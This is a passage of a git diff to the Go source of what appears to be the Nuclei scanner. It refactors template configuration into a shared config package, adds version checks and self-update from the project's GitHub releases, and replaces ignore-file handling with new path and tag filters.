@@ -102,19 +102,42 @@ func (r *Runner) templateLogMsg(id, name, author, severity string) string { message := fmt.Sprintf("[%s] %s (%s)", r.colorizer.BrightBlue(id).String(), r.colorizer.Bold(name).String(), - r.colorizer.BrightYellow("@"+author).String()) + r.colorizer.BrightYellow(appendAtSignToAuthors(author)).String()) if severity != "" { message += " [" + r.severityColors.Data[severity] + "]" } return message } +// appendAtSignToAuthors appends @ before each author and returns final string +func appendAtSignToAuthors(author string) string { + authors := strings.Split(author, ",") + if len(authors) == 0 { + return "@none" + } + if len(authors) == 1 { + if !strings.HasPrefix(authors[0], "@") { + return fmt.Sprintf("@%s", authors[0]) + } + return authors[0] + } + values := make([]string, 0, len(authors)) + for _, k := range authors { + if !strings.HasPrefix(authors[0], "@") { + values = append(values, fmt.Sprintf("@%s", k)) + } else { + values = append(values, k) + } + } + return strings.Join(values, ",") +} + func (r *Runner) logAvailableTemplate(tplPath string) { t, err := r.parseTemplateFile(tplPath) if err != nil { gologger.Error().Msgf("Could not parse file '%s': %s\n", tplPath, err) } else { - gologger.Print().Msgf("%s\n", r.templateLogMsg(t.ID, types.ToString(t.Info["name"]), types.ToString(t.Info["author"]), types.ToString(t.Info["severity"]))) + gologger.Info().Msgf("%s\n", r.templateLogMsg(t.ID, types.ToString(t.Info["name"]), types.ToString(t.Info["author"]), types.ToString(t.Info["severity"]))) } } @@ -151,38 +174,12 @@ func (r *Runner) listAvailableTemplates() { } } -func hasMatchingSeverity(templateSeverity string, allowedSeverities []string) bool { - for _, s := range allowedSeverities { - finalSeverities := []string{} - if strings.Contains(s, ",") { - finalSeverities = strings.Split(s, ",") - } else { - finalSeverities = append(finalSeverities, s) - } - - for _, sev := range finalSeverities { - sev = strings.ToLower(sev) - if sev != "" && strings.HasPrefix(templateSeverity, sev) { - return true - } - } - } - return false -} - func directoryWalker(fsPath string, callback func(fsPath string, d *godirwalk.Dirent) error) error { - err := godirwalk.Walk(fsPath, &godirwalk.Options{ + return godirwalk.Walk(fsPath, &godirwalk.Options{ Callback: callback, ErrorCallback: func(fsPath string, err error) godirwalk.ErrorAction { return godirwalk.SkipNode }, Unsorted: true, }) - - // directory couldn't be walked - if err != nil { - return err - } - - return nil } diff --git a/v2/internal/runner/update.go b/v2/internal/runner/update.go index a122ca58f0..21fc1698b3 100644 --- a/v2/internal/runner/update.go +++ b/v2/internal/runner/update.go @@ -7,21 +7,31 @@ import ( "context" "crypto/md5" "encoding/hex" + "encoding/json" "fmt" "io" "io/ioutil" "net/http" "os" + "path" "path/filepath" + "regexp" + "runtime" "strconv" "strings" "time" + "github.com/apex/log" "github.com/blang/semver" - "github.com/google/go-github/v32/github" + "github.com/google/go-github/github" "github.com/olekukonko/tablewriter" "github.com/pkg/errors" "github.com/projectdiscovery/gologger" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/config" + + "github.com/tj/go-update" + "github.com/tj/go-update/progress" + githubUpdateStore "github.com/tj/go-update/stores/github" ) const ( @@ -29,6 +39,13 @@ const ( repoName = "nuclei-templates" ) +const nucleiIgnoreFile = ".nuclei-ignore" + +// nucleiConfigFilename is the filename of nuclei configuration file. +const nucleiConfigFilename = ".templates-config.json" + +var reVersion = regexp.MustCompile(`\d+\.\d+\.\d+`) + // updateTemplates checks if the default list of nuclei-templates // exist in the users home directory, if not the latest revision // is downloaded from github. @@ -46,34 +63,44 @@ func (r *Runner) updateTemplates() error { templatesConfigFile := filepath.Join(configDir, nucleiConfigFilename) if _, statErr := os.Stat(templatesConfigFile); !os.IsNotExist(statErr) { - config, readErr := readConfiguration() + configuration, readErr := config.ReadConfiguration() if err != nil { return readErr } - r.templatesConfig = config + r.templatesConfig = configuration } ignoreURL := "https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/.nuclei-ignore" if r.templatesConfig == nil { - currentConfig := &nucleiConfig{ - TemplatesDirectory: filepath.Join(home, "nuclei-templates"), + currentConfig := &config.Config{ + TemplatesDirectory: path.Join(home, "nuclei-templates"), IgnoreURL: ignoreURL, - NucleiVersion: Version, + NucleiVersion: config.Version, } - if writeErr := r.writeConfiguration(currentConfig); writeErr != nil { + if writeErr := config.WriteConfiguration(currentConfig, false, false); writeErr != nil { return errors.Wrap(writeErr, "could not write template configuration") } r.templatesConfig = currentConfig } + if r.options.NoUpdateTemplates { + return nil + } // Check if last checked for nuclei-ignore is more than 1 hours. // and if true, run the check. + // + // Also at the same time fetch latest version from github to do outdated nuclei + // and templates check. + checkedIgnore := false if r.templatesConfig == nil || time.Since(r.templatesConfig.LastCheckedIgnore) > 1*time.Hour || r.options.UpdateTemplates { + r.fetchLatestVersionsFromGithub() + if r.templatesConfig != nil && r.templatesConfig.IgnoreURL != "" { ignoreURL = r.templatesConfig.IgnoreURL } gologger.Verbose().Msgf("Downloading config file from %s", ignoreURL) + checkedIgnore = true ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second) req, reqErr := http.NewRequestWithContext(ctx, http.MethodGet, ignoreURL, nil) if reqErr == nil { @@ -91,7 +118,10 @@ func (r *Runner) updateTemplates() error { _ = ioutil.WriteFile(filepath.Join(configDir, nucleiIgnoreFile), data, 0644) } if r.templatesConfig != nil { - r.templatesConfig.LastCheckedIgnore = time.Now() + err = config.WriteConfiguration(r.templatesConfig, false, true) + if err != nil { + gologger.Warning().Msgf("Could not get ignore-file from %s: %s", ignoreURL, err) + } } } } @@ -100,14 +130,11 @@ func (r *Runner) updateTemplates() error { ctx := context.Background() if r.templatesConfig.CurrentVersion == "" || (r.options.TemplatesDirectory != "" && r.templatesConfig.TemplatesDirectory != r.options.TemplatesDirectory) { - if !r.options.UpdateTemplates { - gologger.Warning().Msgf("nuclei-templates are not installed (or indexed), use update-templates flag.\n") - return nil - } + gologger.Info().Msgf("nuclei-templates are not installed, installing...\n") // Use custom location if user has given a template directory - r.templatesConfig = &nucleiConfig{ - TemplatesDirectory: filepath.Join(home, "nuclei-templates"), + r.templatesConfig = &config.Config{ + TemplatesDirectory: path.Join(home, "nuclei-templates"), } if r.options.TemplatesDirectory != "" && r.options.TemplatesDirectory != filepath.Join(home, "nuclei-templates") { r.templatesConfig.TemplatesDirectory = r.options.TemplatesDirectory @@ -120,21 +147,22 @@ func (r *Runner) updateTemplates() error { } gologger.Verbose().Msgf("Downloading nuclei-templates (v%s) to %s\n", version.String(), r.templatesConfig.TemplatesDirectory) + r.fetchLatestVersionsFromGithub() // also fetch latest versions _, err = r.downloadReleaseAndUnzip(ctx, version.String(), asset.GetZipballURL()) if err != nil { return err } r.templatesConfig.CurrentVersion = version.String() - err = r.writeConfiguration(r.templatesConfig) + err = config.WriteConfiguration(r.templatesConfig, true, checkedIgnore) if err != nil { return err } - gologger.Info().Msgf("Successfully downloaded nuclei-templates (v%s). Enjoy!\n", version.String()) + gologger.Info().Msgf("Successfully downloaded nuclei-templates (v%s). GoodLuck!\n", version.String()) return nil } - // Check if last checked is more than 24 hours. + // Check if last checked is more than 24 hours and we don't have updateTemplates flag. // If not, return since we don't want to do anything now. if time.Since(r.templatesConfig.LastChecked) < 24*time.Hour && !r.options.UpdateTemplates { return nil @@ -161,15 +189,12 @@ func (r *Runner) updateTemplates() error { } if version.EQ(oldVersion) { - gologger.Info().Msgf("Your nuclei-templates are up to date: v%s\n", oldVersion.String()) - return r.writeConfiguration(r.templatesConfig) + return config.WriteConfiguration(r.templatesConfig, false, checkedIgnore) } if version.GT(oldVersion) { - if !r.options.UpdateTemplates { - gologger.Warning().Msgf("Your current nuclei-templates v%s are outdated. Latest is v%s\n", oldVersion, version.String()) - return r.writeConfiguration(r.templatesConfig) - } + gologger.Info().Msgf("Your current nuclei-templates v%s are outdated. Latest is v%s\n", oldVersion, version.String()) + gologger.Info().Msgf("Downloading latest release...") if r.options.TemplatesDirectory != "" { r.templatesConfig.TemplatesDirectory = r.options.TemplatesDirectory @@ -177,15 +202,16 @@ func (r *Runner) updateTemplates() error { r.templatesConfig.CurrentVersion = version.String() gologger.Verbose().Msgf("Downloading nuclei-templates (v%s) to %s\n", version.String(), r.templatesConfig.TemplatesDirectory) + r.fetchLatestVersionsFromGithub() _, err = r.downloadReleaseAndUnzip(ctx, version.String(), asset.GetZipballURL()) if err != nil { return err } - err = r.writeConfiguration(r.templatesConfig) + err = config.WriteConfiguration(r.templatesConfig, true, checkedIgnore) if err != nil { return err } - gologger.Info().Msgf("Successfully updated nuclei-templates (v%s). Enjoy!\n", version.String()) + gologger.Info().Msgf("Successfully updated nuclei-templates (v%s). GoodLuck!\n", version.String()) } return nil } @@ -266,8 +292,10 @@ func (r *Runner) downloadReleaseAndUnzip(ctx context.Context, version, downloadU return nil, fmt.Errorf("failed to write templates: %s", err) } - r.printUpdateChangelog(results, version) - checksumFile := filepath.Join(r.templatesConfig.TemplatesDirectory, ".checksum") + if r.options.Verbose { + r.printUpdateChangelog(results, version) + } + checksumFile := path.Join(r.templatesConfig.TemplatesDirectory, ".checksum") err = writeTemplatesChecksum(checksumFile, results.checksums) if err != nil { return nil, errors.Wrap(err, "could not write checksum") @@ -442,7 +470,7 @@ func writeTemplatesChecksum(file string, checksum map[string]string) error { } func (r *Runner) printUpdateChangelog(results *templateUpdateResults, version string) { - if len(results.additions) > 0 { + if len(results.additions) > 0 && r.options.Verbose { gologger.Print().Msgf("\nNewly added templates: \n\n") for _, addition := range results.additions { @@ -461,3 +489,108 @@ func (r *Runner) printUpdateChangelog(results *templateUpdateResults, version st } table.Render() } + +// fetchLatestVersionsFromGithub fetches latest versions of nuclei repos from github +func (r *Runner) fetchLatestVersionsFromGithub() { + nucleiLatest, err := r.githubFetchLatestTagRepo("projectdiscovery/nuclei") + if err != nil { + gologger.Warning().Msgf("Could not fetch latest nuclei release: %s", err) + } + templatesLatest, err := r.githubFetchLatestTagRepo("projectdiscovery/nuclei-templates") + if err != nil { + gologger.Warning().Msgf("Could not fetch latest nuclei-templates release: %s", err) + } + if r.templatesConfig != nil { + r.templatesConfig.NucleiLatestVersion = nucleiLatest + r.templatesConfig.NucleiTemplatesLatestVersion = templatesLatest + } +} + +type githubTagData struct { + Name string +} + +// githubFetchLatestTagRepo fetches latest tag from github +// This function was half written by github copilot AI :D. +func (r *Runner) githubFetchLatestTagRepo(repo string) (string, error) { + ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second) + defer cancel() + + url := fmt.Sprintf("https://api.github.com/repos/%s/tags", repo) + req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil) + if err != nil { + return "", err + } + resp, err := http.DefaultClient.Do(req) + if err != nil { + return "", err + } + + defer resp.Body.Close() + body, err := ioutil.ReadAll(resp.Body) + if err != nil { + return "", err + } + + var tags []githubTagData + err = json.Unmarshal(body, &tags) + if err != nil { + return "", err + } + if len(tags) == 0 { + return "", fmt.Errorf("no tags found for %s", repo) + } + return strings.TrimPrefix(tags[0].Name, "v"), nil +} + +// updateNucleiVersionToLatest implements nuclei auto-updation using Github Releases. +func updateNucleiVersionToLatest(verbose bool) error { + if verbose { + log.SetLevel(log.DebugLevel) + } + var command string + switch runtime.GOOS { + case "windows": + command = "nuclei.exe" + default: + command = "nuclei" + } + m := &update.Manager{ + Command: command, + Store: &githubUpdateStore.Store{ + Owner: "projectdiscovery", + Repo: "nuclei", + Version: config.Version, + }, + } + releases, err := m.LatestReleases() + if err != nil { + return errors.Wrap(err, "could not fetch latest release") + } + if len(releases) == 0 { + gologger.Info().Msgf("No new updates found for nuclei engine!") + return nil + } + + latest := releases[0] + var currentOS string + switch runtime.GOOS { + case "darwin": + currentOS = "macOS" + default: + currentOS = runtime.GOOS + } + final := latest.FindZip(currentOS, runtime.GOARCH) + if final == nil { + return fmt.Errorf("no compatible binary found for %s/%s", currentOS, runtime.GOARCH) + } + tarball, err := final.DownloadProxy(progress.Reader) + if err != nil { + return errors.Wrap(err, "could not download latest release") + } + if err := m.Install(tarball); err != nil { + return errors.Wrap(err, "could not install latest release") + } + gologger.Info().Msgf("Successfully updated to Nuclei %s\n", latest.Version) + return nil +} diff --git a/v2/internal/runner/update_test.go b/v2/internal/runner/update_test.go index 8ee4e9478b..6802297797 100644 --- a/v2/internal/runner/update_test.go +++ b/v2/internal/runner/update_test.go @@ -15,6 +15,7 @@ import ( "github.com/projectdiscovery/gologger" "github.com/projectdiscovery/nuclei/v2/internal/testutils" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/config" "github.com/stretchr/testify/require" ) @@ -41,8 +42,7 @@ func TestDownloadReleaseAndUnzipAddition(t *testing.T) { require.Nil(t, err, "could not create temp directory") defer os.RemoveAll(templatesDirectory) - r := &Runner{templatesConfig: &nucleiConfig{TemplatesDirectory: templatesDirectory}} - + r := &Runner{templatesConfig: &config.Config{TemplatesDirectory: templatesDirectory}, options: testutils.DefaultOptions} results, err := r.downloadReleaseAndUnzip(context.Background(), "1.0.0", ts.URL) require.Nil(t, err, "could not download release and unzip") require.Equal(t, "base.yaml", results.additions[0], "could not get correct base addition") @@ -94,7 +94,7 @@ func TestDownloadReleaseAndUnzipDeletion(t *testing.T) { require.Nil(t, err, "could not create temp directory") defer os.RemoveAll(templatesDirectory) - r := &Runner{templatesConfig: &nucleiConfig{TemplatesDirectory: templatesDirectory}} + r := &Runner{templatesConfig: &config.Config{TemplatesDirectory: templatesDirectory}, options: testutils.DefaultOptions} results, err := r.downloadReleaseAndUnzip(context.Background(), "1.0.0", ts.URL) require.Nil(t, err, "could not download release and unzip") diff --git a/v2/internal/testutils/integration.go b/v2/internal/testutils/integration.go index 47d7e477ba..1f59c30118 100644 --- a/v2/internal/testutils/integration.go +++ b/v2/internal/testutils/integration.go @@ -1,15 +1,17 @@ package testutils import ( + "errors" "net" "os" "os/exec" + "regexp" "strings" ) // RunNucleiAndGetResults returns a list of results for a template func RunNucleiAndGetResults(template, url string, debug bool, extra ...string) ([]string, error) { - cmd := exec.Command("./nuclei", "-t", template, "-target", url) + cmd := exec.Command("./nuclei", "-t", template, "-target", url, "-silent") if debug { cmd = exec.Command("./nuclei", "-t", template, "-target", url, "-debug") cmd.Stderr = os.Stderr @@ -30,9 +32,26 @@ func RunNucleiAndGetResults(template, url string, debug bool, extra ...string) ( return parts, nil } +var templateLoaded = regexp.MustCompile(`(?:Templates|Workflows) loaded: (\d+)`) + +// RunNucleiAndGetResults returns a list of results for a template +func RunNucleiBinaryAndGetLoadedTemplates(nucleiBinary string, args []string) (string, error) { + cmd := exec.Command(nucleiBinary, args...) + + data, err := cmd.CombinedOutput() + if err != nil { + return "", err + } + matches := templateLoaded.FindAllStringSubmatch(string(data), -1) + if len(matches) == 0 { + return "", errors.New("no matches found") + } + return matches[0][1], nil +} + // RunNucleiWorkflowAndGetResults returns a list of results for a workflow func RunNucleiWorkflowAndGetResults(template, url string, debug bool, extra ...string) ([]string, error) { - cmd := exec.Command("./nuclei", "-w", template, "-target", url) + cmd := exec.Command("./nuclei", "-w", template, "-target", url, "-silent") if debug { cmd = exec.Command("./nuclei", "-w", template, "-target", url, "-debug") cmd.Stderr = os.Stderr diff --git a/v2/internal/testutils/testutils.go b/v2/internal/testutils/testutils.go index 93c8b2fd94..b6f1bf0747 100644 --- a/v2/internal/testutils/testutils.go +++ b/v2/internal/testutils/testutils.go @@ -19,43 +19,42 @@ func Init(options *types.Options) { // DefaultOptions is the default options structure for nuclei during mocking. var DefaultOptions = &types.Options{ - Metrics: false, - Debug: false, - DebugRequests: false, - DebugResponse: false, - Silent: false, - Version: false, - Verbose: false, - NoColor: true, - UpdateTemplates: false, - JSON: false, - JSONRequests: false, - EnableProgressBar: false, - TemplatesVersion: false, - TemplateList: false, - Stdin: false, - StopAtFirstMatch: false, - NoMeta: false, - Project: false, - MetricsPort: 0, - BulkSize: 25, - TemplateThreads: 10, - Timeout: 5, - Retries: 1, - RateLimit: 150, - BurpCollaboratorBiid: "", - ProjectPath: "", - Severity: []string{}, - Target: "", - Targets: "", - Output: "", - ProxyURL: "", - ProxySocksURL: "", - TemplatesDirectory: "", - TraceLogFile: "", - Templates: []string{}, - ExcludedTemplates: []string{}, - CustomHeaders: []string{}, + Metrics: false, + Debug: false, + DebugRequests: false, + DebugResponse: false, + Silent: false, + Version: false, + Verbose: false, + NoColor: true, + UpdateTemplates: false, + JSON: false, + JSONRequests: false, + EnableProgressBar: false, + TemplatesVersion: false, + TemplateList: false, + Stdin: false, + StopAtFirstMatch: false, + NoMeta: false, + Project: false, + MetricsPort: 0, + BulkSize: 25, + TemplateThreads: 10, + Timeout: 5, + Retries: 1, + RateLimit: 150, + ProjectPath: "", + Severity: []string{}, + Targets: []string{}, + TargetsFilePath: "", + Output: "", + ProxyURL: "", + ProxySocksURL: "", + TemplatesDirectory: "", + TraceLogFile: "", + Templates: []string{}, + ExcludedTemplates: []string{}, + CustomHeaders: []string{}, } // MockOutputWriter is a mocked output writer. @@ -102,7 +101,7 @@ type TemplateInfo struct { // NewMockExecuterOptions creates a new mock executeroptions struct func NewMockExecuterOptions(options *types.Options, info *TemplateInfo) *protocols.ExecuterOptions { - progressImpl, _ := progress.NewStatsTicker(0, false, false, 0) + progressImpl, _ := progress.NewStatsTicker(0, false, false, false, 0) executerOpts := &protocols.ExecuterOptions{ TemplateID: info.ID, TemplateInfo: info.Info, diff --git a/v2/pkg/catalog/catalogue.go b/v2/pkg/catalog/catalogue.go index c085e5c2de..38a58d7cc0 100644 --- a/v2/pkg/catalog/catalogue.go +++ b/v2/pkg/catalog/catalogue.go @@ -2,7 +2,6 @@ package catalog // Catalog is a template catalog helper implementation type Catalog struct { - ignoreFiles []string templatesDirectory string } @@ -11,8 +10,3 @@ func New(directory string) *Catalog { catalog := &Catalog{templatesDirectory: directory} return catalog } - -// AppendIgnore appends to the catalog store ignore list. -func (c *Catalog) AppendIgnore(list []string) { - c.ignoreFiles = append(c.ignoreFiles, list...) -} diff --git a/v2/pkg/catalog/config/config.go b/v2/pkg/catalog/config/config.go new file mode 100644 index 0000000000..478ef3793b --- /dev/null +++ b/v2/pkg/catalog/config/config.go @@ -0,0 +1,138 @@ +package config + +import ( + "os" + "path" + "time" + + jsoniter "github.com/json-iterator/go" + "github.com/pkg/errors" + "github.com/projectdiscovery/gologger" + "gopkg.in/yaml.v2" +) + +// Config contains the internal nuclei engine configuration +type Config struct { + TemplatesDirectory string `json:"templates-directory,omitempty"` + CurrentVersion string `json:"current-version,omitempty"` + LastChecked time.Time `json:"last-checked,omitempty"` + IgnoreURL string `json:"ignore-url,omitempty"` + NucleiVersion string `json:"nuclei-version,omitempty"` + LastCheckedIgnore time.Time `json:"last-checked-ignore,omitempty"` + + NucleiLatestVersion string `json:"nuclei-latest-version"` + NucleiTemplatesLatestVersion string `json:"nuclei-templates-latest-version"` +} + +// nucleiConfigFilename is the filename of nuclei configuration file. +const nucleiConfigFilename = ".templates-config.json" + +// Version is the current version of nuclei +const Version = `2.4.3-dev` + +func getConfigDetails() (string, error) { + homeDir, err := os.UserHomeDir() + if err != nil { + return "", errors.Wrap(err, "could not get home directory") + } + configDir := path.Join(homeDir, "/.config", "/nuclei") + _ = os.MkdirAll(configDir, os.ModePerm) + templatesConfigFile := path.Join(configDir, nucleiConfigFilename) + return templatesConfigFile, nil +} + +// ReadConfiguration reads the nuclei configuration file from disk. +func ReadConfiguration() (*Config, error) { + templatesConfigFile, err := getConfigDetails() + if err != nil { + return nil, err + } + + file, err := os.Open(templatesConfigFile) + if err != nil { + return nil, err + } + defer file.Close() + + config := &Config{} + err = jsoniter.NewDecoder(file).Decode(config) + if err != nil { + return nil, err + } + return config, nil +} + +// WriteConfiguration writes the updated nuclei configuration to disk +func WriteConfiguration(config *Config, checked, checkedIgnore bool) error { + if config.IgnoreURL == "" { + config.IgnoreURL = "https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/.nuclei-ignore" + } + if checked { + config.LastChecked = time.Now() + } + if checkedIgnore { + config.LastCheckedIgnore = time.Now() + } + config.NucleiVersion = Version + + templatesConfigFile, err := getConfigDetails() + if err != nil { + return err + } + file, err := os.OpenFile(templatesConfigFile, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0777) + if err != nil { + return err + } + defer file.Close() + + err = jsoniter.NewEncoder(file).Encode(config) + if err != nil { + return err + } + return nil +} + +const nucleiIgnoreFile = ".nuclei-ignore" + +// IgnoreFile is an internal nuclei template blocking configuration file +type IgnoreFile struct { + Tags []string `yaml:"tags"` + Files []string `yaml:"files"` +} + +// ReadIgnoreFile reads the nuclei ignore file returning blocked tags and paths +func ReadIgnoreFile() IgnoreFile { + file, err := os.Open(getIgnoreFilePath()) + if err != nil { + gologger.Error().Msgf("Could not read nuclei-ignore file: %s\n", err) + return IgnoreFile{} + } + defer file.Close() + + ignore := IgnoreFile{} + if err := yaml.NewDecoder(file).Decode(&ignore); err != nil { + gologger.Error().Msgf("Could not parse nuclei-ignore file: %s\n", err) + return IgnoreFile{} + } + return ignore +} + +// getIgnoreFilePath returns the ignore file path for the runner +func getIgnoreFilePath() string { + var defIgnoreFilePath string + + home, err := os.UserHomeDir() + if err == nil { + configDir := path.Join(home, "/.config", "/nuclei") + _ = os.MkdirAll(configDir, os.ModePerm) + + defIgnoreFilePath = path.Join(configDir, nucleiIgnoreFile) + return defIgnoreFilePath + } + cwd, err := os.Getwd() + if err != nil { + return defIgnoreFilePath + } + cwdIgnoreFilePath := path.Join(cwd, nucleiIgnoreFile) + return cwdIgnoreFilePath +} diff --git a/v2/pkg/catalog/find.go b/v2/pkg/catalog/find.go index f5c54f2cf8..92e6d47f92 100644 --- a/v2/pkg/catalog/find.go +++ b/v2/pkg/catalog/find.go @@ -11,7 +11,7 @@ import ( ) // GetTemplatesPath returns a list of absolute paths for the provided template list. -func (c *Catalog) GetTemplatesPath(definitions []string, noCheckIgnore bool) []string { +func (c *Catalog) GetTemplatesPath(definitions []string) []string { // keeps track of processed dirs and files processed := make(map[string]bool) allTemplates := []string{} @@ -22,18 +22,12 @@ func (c *Catalog) GetTemplatesPath(definitions []string, noCheckIgnore bool) []s gologger.Error().Msgf("Could not find template '%s': %s\n", t, err) } for _, path := range paths { - if !noCheckIgnore && c.checkIfInNucleiIgnore(path) { - continue - } if _, ok := processed[path]; !ok { processed[path] = true allTemplates = append(allTemplates, path) } } } - if len(allTemplates) > 0 { - gologger.Verbose().Msgf("Identified %d templates", len(allTemplates)) - } return allTemplates } diff --git a/v2/pkg/catalog/ignore.go b/v2/pkg/catalog/ignore.go deleted file mode 100644 index c3ecb99104..0000000000 --- a/v2/pkg/catalog/ignore.go +++ /dev/null @@ -1,58 +0,0 @@ -package catalog - -import ( - "strings" - - "github.com/projectdiscovery/gologger" -) - -// checkIfInNucleiIgnore checks if a path falls under nuclei-ignore rules. -func (c *Catalog) checkIfInNucleiIgnore(item string) bool { - if c.templatesDirectory == "" { - return false - } - - matched := false - for _, paths := range c.ignoreFiles { - if !strings.HasSuffix(paths, ".yaml") { - if strings.HasSuffix(strings.TrimSuffix(item, "/"), strings.TrimSuffix(paths, "/")) { - matched = true - break - } - } else if strings.HasSuffix(item, paths) { - matched = true - break - } - } - if matched { - gologger.Warning().Msgf("Excluding %s due to nuclei-ignore filter", item) - return true - } - return false -} - -// ignoreFilesWithExcludes ignores results with exclude paths -func (c *Catalog) ignoreFilesWithExcludes(results, excluded []string) []string { - var templates []string - - for _, result := range results { - matched := false - for _, paths := range excluded { - if !strings.HasSuffix(paths, ".yaml") { - if strings.HasSuffix(strings.TrimSuffix(result, "/"), strings.TrimSuffix(paths, "/")) { - matched = true - break - } - } else if strings.HasSuffix(result, paths) { - matched = true - break - } - } - if !matched { - templates = append(templates, result) - } else { - gologger.Error().Msgf("Excluding %s due to excludes filter", result) - } - } - return templates -} diff --git a/v2/pkg/catalog/ignore_test.go b/v2/pkg/catalog/ignore_test.go deleted file mode 100644 index 845696a4f2..0000000000 --- a/v2/pkg/catalog/ignore_test.go +++ /dev/null @@ -1,40 +0,0 @@ -package catalog - -import ( - "fmt" - "testing" - - "github.com/stretchr/testify/require" -) - -func TestIgnoreFilesIgnore(t *testing.T) { - c := &Catalog{ - ignoreFiles: []string{"workflows/", "cves/2020/cve-2020-5432.yaml"}, - templatesDirectory: "test", - } - tests := []struct { - path string - ignore bool - }{ - {"workflows/", true}, - {"misc", false}, - {"cves/", false}, - {"cves/2020/cve-2020-5432.yaml", true}, - {"/Users/test/nuclei-templates/workflows/", true}, - {"/Users/test/nuclei-templates/misc", false}, - {"/Users/test/nuclei-templates/cves/", false}, - {"/Users/test/nuclei-templates/cves/2020/cve-2020-5432.yaml", true}, - } - for _, test := range tests { - require.Equal(t, test.ignore, c.checkIfInNucleiIgnore(test.path), fmt.Sprintf("could not ignore file correctly: %v", test)) - } -} - -func TestExcludeFilesIgnore(t *testing.T) { - c := &Catalog{} - excludes := []string{"workflows/", "cves/2020/cve-2020-5432.yaml"} - paths := []string{"/Users/test/nuclei-templates/workflows/", "/Users/test/nuclei-templates/cves/2020/cve-2020-5432.yaml", "/Users/test/nuclei-templates/workflows/test-workflow.yaml", "/Users/test/nuclei-templates/cves/"} - - data := c.ignoreFilesWithExcludes(paths, excludes) - require.Equal(t, []string{"/Users/test/nuclei-templates/workflows/test-workflow.yaml", "/Users/test/nuclei-templates/cves/"}, data, "could not exclude correct files") -} diff --git a/v2/pkg/catalog/loader/filter/path_filter.go b/v2/pkg/catalog/loader/filter/path_filter.go new file mode 100644 index 0000000000..f938dcff72 --- /dev/null +++ b/v2/pkg/catalog/loader/filter/path_filter.go @@ -0,0 +1,45 @@ +package filter + +import "github.com/projectdiscovery/nuclei/v2/pkg/catalog" + +// PathFilter is a path based template filter +type PathFilter struct { + excludedTemplates []string + alwaysIncludedTemplatesMap map[string]struct{} +} + +// PathFilterConfig contains configuration options for Path based templates Filter +type PathFilterConfig struct { + IncludedTemplates []string + ExcludedTemplates []string +} + +// NewPathFilter creates a new path filter from provided config +func NewPathFilter(config *PathFilterConfig, catalogClient *catalog.Catalog) *PathFilter { + filter := &PathFilter{ + excludedTemplates: catalogClient.GetTemplatesPath(config.ExcludedTemplates), + alwaysIncludedTemplatesMap: make(map[string]struct{}), + } + + alwaysIncludeTemplates := catalogClient.GetTemplatesPath(config.IncludedTemplates) + for _, tpl := range alwaysIncludeTemplates { + filter.alwaysIncludedTemplatesMap[tpl] = struct{}{} + } + return filter +} + +// Match performs match for path filter on templates and returns final list +func (p *PathFilter) Match(templates []string) map[string]struct{} { + templatesMap := make(map[string]struct{}) + for _, tpl := range templates { + templatesMap[tpl] = struct{}{} + } + for _, template := range p.excludedTemplates { + if _, ok := p.alwaysIncludedTemplatesMap[template]; ok { + continue + } else { + delete(templatesMap, template) + } + } + return templatesMap +} diff --git a/v2/pkg/catalog/loader/filter/tag_filter.go b/v2/pkg/catalog/loader/filter/tag_filter.go new file mode 100644 index 0000000000..59c81d74a0 --- /dev/null +++ b/v2/pkg/catalog/loader/filter/tag_filter.go @@ -0,0 +1,178 @@ +package filter + +import ( + "errors" + "strings" +) + +// TagFilter is used to filter nuclei templates for tag based execution +type TagFilter struct { + allowedTags map[string]struct{} + severities map[string]struct{} + authors map[string]struct{} + block map[string]struct{} + matchAllows map[string]struct{} +} + +// ErrExcluded is returned for execluded templates +var ErrExcluded = errors.New("the template was excluded") + +// Match takes a tag and whether the template was matched from user +// input and returns true or false using a tag filter. +// +// If the tag was specified in deny list, it will not return true +// unless it is explicitly specified by user in includeTags which is the +// matchAllows section. +// +// It returns true if the tag is specified, or false. +func (t *TagFilter) Match(tag, author, severity string) (bool, error) { + matchedAny := false + if len(t.allowedTags) > 0 { + _, ok := t.allowedTags[tag] + if ok { + matchedAny = true + } + } + _, ok := t.block[tag] + if ok { + if _, allowOk := t.matchAllows[tag]; allowOk { + return true, nil + } + return false, ErrExcluded + } + if len(t.authors) > 0 { + _, ok = t.authors[author] + if !ok { + return false, nil + } + matchedAny = true + } + if len(t.severities) > 0 { + _, ok = t.severities[severity] + if !ok { + return false, nil + } + matchedAny = true + } + if len(t.allowedTags) == 0 && len(t.authors) == 0 && len(t.severities) == 0 { + return true, nil + } + return matchedAny, nil +} + +// MatchWithAllowedTags takes an addition list of allowed tags +// and returns true if the match was successful. +func (t *TagFilter) MatchWithAllowedTags(allowed []string, tag, author, severity string) (bool, error) { + matchedAny := false + + allowedMap := make(map[string]struct{}) + for _, tag := range allowed { + for _, val := range splitCommaTrim(tag) { + if _, ok := allowedMap[val]; !ok { + allowedMap[val] = struct{}{} + } + } + } + if len(allowedMap) > 0 { + _, ok := allowedMap[tag] + if ok { + matchedAny = true + } + } + _, ok := t.block[tag] + if ok && !matchedAny { + if _, allowOk := t.matchAllows[tag]; allowOk { + return true, nil + } + return false, ErrExcluded + } + if len(t.authors) > 0 { + _, ok = t.authors[author] + if !ok { + return false, nil + } + matchedAny = true + } + if len(t.severities) > 0 { + _, ok = t.severities[severity] + if !ok { + return false, nil + } + matchedAny = true + } + if len(allowedMap) == 0 && len(t.authors) == 0 && len(t.severities) == 0 { + return true, nil + } + return matchedAny, nil +} + +type Config struct { + Tags []string + ExcludeTags []string + Authors []string + Severities []string + IncludeTags []string +} + +// New returns a tag filter for nuclei tag based execution +// +// It takes into account Tags, Severities, Authors, IncludeTags, ExcludeTags. +func New(config *Config) *TagFilter { + filter := &TagFilter{ + allowedTags: make(map[string]struct{}), + authors: make(map[string]struct{}), + severities: make(map[string]struct{}), + block: make(map[string]struct{}), + matchAllows: make(map[string]struct{}), + } + for _, tag := range config.ExcludeTags { + for _, val := range splitCommaTrim(tag) { + if _, ok := filter.block[val]; !ok { + filter.block[val] = struct{}{} + } + } + } + for _, tag := range config.Severities { + for _, val := range splitCommaTrim(tag) { + if _, ok := filter.severities[val]; !ok { + filter.severities[val] = struct{}{} + } + } + } + for _, tag := range config.Authors { 